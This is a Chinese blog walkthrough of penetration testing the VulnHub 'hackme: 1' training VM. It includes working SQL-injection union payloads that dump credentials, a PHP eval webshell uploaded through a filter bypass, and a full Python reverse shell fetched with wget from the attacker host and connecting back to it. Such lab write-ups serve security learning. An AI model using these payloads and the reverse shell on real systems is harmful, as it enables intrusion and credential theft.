hackme-1靶机渗透详解

最新推荐文章于 2023-12-18 17:46:11 发布
最新推荐文章于 2023-12-18 17:46:11 发布
阅读量723 收藏 5
点赞数 1
文章标签: 安全 web安全 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_63124284/article/details/127302247
版权

目录

靶机描述

环境搭建

靶机渗透

一、 信息收集

二、 漏洞挖掘

SQL注入

文件上传漏洞

三、 漏洞利用

反弹shell:一句话木马,蚁剑连接

四、 提权

靶机描述

靶机基本信息:

链接 hackme: 1 ~ VulnHubhackme: 1, made by x4bx54. Download & walkthrough links are available.https://www.vulnhub.com/entry/hackme-1,330/

“hackme”是一个初学者难度等级框。目标是通过web漏洞获得有限的权限访问,然后权限升级为root。这个实验室是为了模拟现实生活环境而创建的。

“hackme”使用DHCP,并且在mysqld可能自行关闭的情况下(非常罕见的情况),尝试强制重新启动机器,然后机器应该可以正常工作。

环境搭建

1、下载并导入靶机
打开vmware–文件–打开–hackme.ova

查看网络适配器
将靶机网络适配器改为仅主机模式

2、启动靶机
点击 ▶靶机,开启成功

靶机渗透

一、信息收集

1、主机发现

arp-scan -l

2、扫描端口

nmap -T4 -sV -O -p 22,80 192.168.31.116

3、扫描目录

(1) dirb目录扫描 dirb http://192.168.31.116/usr/share/dirb/wordlists/big.txt

(2)gobuster目录扫描 gobuster dir -e -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,txt,zip,html -u http://192.168.31.116 -t 30

4、网站指纹识别 whatweb http://192.168.31.116

 

二、漏洞挖掘

sql注入

1、登录主页发现登录页面,而且还可以注册用户

2、点击 Sign up now 注册用户admin 密码123456

3、登录admin用户 单击search可以进行查看到很多的书名

4、验证sql注入 Windows OS' and 1=1#

Windows OS' and 1=2#

由以上验证出此处存在字符型(单引号)sql注入

5、判断字段数 Windows OS' order by 3#

Windows OS' order by 4#

判断出来字段数是3个

6、判断显示位置

-1' union select 1,2,3#

7、查看当前数据库位置

-1' union select database(),2,3#

8、查看webapphacking库所有的表 -1' union select group_concat(table_name),2,3 from information_schema.tables where table_schema='webapphacking'#

9、查看users表中所有的列 -1' union select group_concat(column_name),2,3 from information_schema.columns where table_name='users'#

10、查看表中user,password字段数据

-1' union select group_concat(user),group_concat(pasword),3 from users#

11、将得到密码进行MD5解密

文件上传漏洞

1、使用superadmin用户登录 密码:Uncrackable

发现文件上传点

2、上传phpinfo()进行验证

制作假图片头 GIF89a<?php phpinfo(); ?>

上传前先开启burp抓包

3、拦截-修改后缀,我们可以从回包中看出文件已将上传至文件夹

4、查看你目录扫描出的路径 http://192.168.31.116/uploads/phpinfo.php

该上传点存在文件上传漏洞,并且假图片头与图片马均可以

 

三、漏洞利用

1、制作图片马 <?php @eval($_POST[shell]); ?>2、同上面上传phpinfo.jpg一样,上传图片马
抓包–修改后缀–发送,可以看出上传成功

3、访问上传的图片马 http://192.168.31.116/uploads/b.php

4、蚁剑连接成功

5、上传反弹shell脚本
将反弹shell放在网站根目录下,开启http服务 service apache2 start

import socket,subprocess,os

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)

s.connect(("192.168.31.100",1234))

os.dup2(s.fileno(),0)

os.dup2(s.fileno(),1)

os.dup2(s.fileno(),2)

p=subprocess.call(["/bin/bash","-i"])

6、在蚁剑终端上下载 wget http://192.168.31.100/shell.py

7、kali监听1234端口

8、运行 python shell.py

9、反弹shell成功

四、 提权

1、识别所存在的用户 cat /etc/passwd | grep /bin/bash

2、在/home/legacy路径下发现二进制文件touchmenot,执行二进制文件

 

恸.283
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Hackme靶机渗透
m0_50584370的博客
06-01 218
hackme靶机渗透
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
靶机渗透 hackme-1(详解,适合新手)
君莫hacker的博客
09-05 5982
靶机hackme-1的目录0x01靶机描述0x02环境搭建0x03靶机渗透一、 信息收集二、 漏洞挖掘SQL注入文件上传漏洞三、 漏洞利用反弹shell方法一:一句话木马,蚁剑连接反弹shell方法二:system命令执行四、 提权0x04实验总结 0x01靶机描述 靶机基本信息: 链接 https://www.vulnhub.com/entry/hackme-1,330/ 发布时间 18 Jul 2019 作者 x4bx54 难度 简单 靶机基本介绍: “hackme”是一个
DC-1靶机渗透(教程以及思路)
菜菜的博客
10-20 2767
一般来说这样的端口,我会先从80端口开始,看是否存在登录页面,是否存在弱口令,是否存在sql注入,dirb遍历目录,查看是否有可疑的目录,使用指纹识别查看cms版本是否存在漏洞。我这里因为靶机出了点问题,连不进去了,一般来说那个网站的密码都会是在库里面,有一个name,还有一个password,用来进行登入网站后台。因为是Linux那么我们接下来输入的命令也得是Linux的,ls查看一下有什么文件,发现有一个flag1.txt,查看。发现开启了4个端口,分别是22,80,111,45186。
靶机渗透HACKME: 1
安全狐
07-19 891
靶机渗透HACKME: 1 本篇将分享一个来源于VulnHub社区,适合初学者的靶机HACKME: 1 0x01靶机介绍 1. 详情 链接 https://www.vulnhub.com/entry/hackme-1,330/ 发布日期 2019年7月18日 作者 x4bx54 难度 初学者,简单 2. 描述 'hackme' is a beginner difficulty level box. The goal is to gain limite
Vulnhub靶机渗透测试 Five-1靶机
12-07
Vulnhub靶机渗透测试 Five-1靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
靶机简单渗透测试
KKK_2178的博客
11-22 5491
1.下载靶机Metasploitable2-Linux,下载地址:Metasploitable download | SourceForge.net 2.在虚拟机中打开Kali-Linux和下载好的Metasploitable2-Linux,Metasploitable2-Linux的账号:msfadmin,密码:msfadmin. 3.在靶机中输入指令ifconfig,得到靶机ip 4.返回Kali虚拟机操作 输入指令nmap xxxxx (xxxxx为你靶机的ip)查看靶机端口.
tryhackme靶场: Mr Robot CTF
m0_64348326的博客
06-20 236
6.再来爆破出密码,这里字典太长且有很多数据重复,直接查看这部分的结果,在第八万多条的。8.根据选项面版RCE描述的方法,主题编辑器右侧找到404页面,添加。搭建的博客站登陆页面,根据登陆时的报错回显,利用下载的字典和。按照最新版的burp社区版爆破速度,估计要爆破到靶机结束。解密,但是还是得付费。需要收费,只能手动搜索了。,由于Linux系统的问题后面不需要再加。工具配合默认字典进行目录扫描,结果中的。7.进入后台后,准备查找历史漏洞,但是。命令,发现要输入密码,读取目录下的。命令开出bash命令窗。
hackme-1打靶记录
wwd180的博客
06-12 91
实验主机:hackme-1靶机一台/Kali linux攻击机一台实验网络:桥接网络实验目标:获取靶机的Root权限。
靶机渗透【lazysysadmin】
学信安技术 卫国家之门
01-11 6205
文章目录*一. lazysysadmin靶机安装*1. 下载靶机2. 打开靶机*二. lazysysadmin靶机渗透*1. 信息收集2. Web渗透3. 共享服务4. ssh服务5. 文件上传 一. lazysysadmin靶机安装 1. 下载靶机 百度网盘链接提取码 lazysysadmin.zip 提取码:m02v 2. 打开靶机 打开 VMware,在左上角选择 - - 文件 - - 打开 找到 lazysysadmin 靶机解压位置 开启后如图所示 二. lazysy
W1R3S - VulnHub(漏洞靶机渗透测试)
Start C的博客
12-05 965
VulnHub靶机学习 - W1R3S
Fawkes 靶机之 缓冲区溢出、漏洞利用代码编写等利用
qq_40898302的博客
04-28 364
主机发现 端口扫描 WEB信息收集 FTP服务攻击 缓冲区溢出 模糊测试 漏洞利用代码编写 流量转包分析 堆溢出漏洞攻击 Metasploit(MSF) 手动修复EXP代码 本地提权
Stapler-1靶场详细教学(7种漏洞利用+5种提权)
weixin_60374959的博客
12-30 2874
这个靶场令我收获颇深,因为这里利用到的一些手法已经算是实战的技术,同时这里使用了多种方法getshell,getsehll之后又展示了多中方法提权,更多的开拓了我们的思维。我们这里总共用到了7种方法获取权限,5钟方式获取root权限,很大程度开阔了哦我们的思路,如果有别的方法的小伙伴欢迎提出建议哦。
红队打靶练习:HACKME: 1
最新发布
分享
12-18 427
红队打靶练习:HACKME: 1 , 犹如猛虎撕咬般的恐惧感.....
PHP一句话木马使用技巧
热门推荐
shy的博客
01-20 1万+
近来发现好多网站有安全狗,会拦截菜刀和蚁剑,因此总结下通过浏览器直接调用一句话木马的姿势。 PHP一句话:<?php @eval($_POST['shy']);?> firefox浏览器:hackbar 命令提示符:curl 首先上传一句话木马到网站目录,可以是虚拟机也可以是VPS,我这里用的是阿里云我自己搭建的网站, 由于只是简单的一句话木马,因次一上车就收到了安全云的短信...
渗透DC-1靶机设计思路
05-24
1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值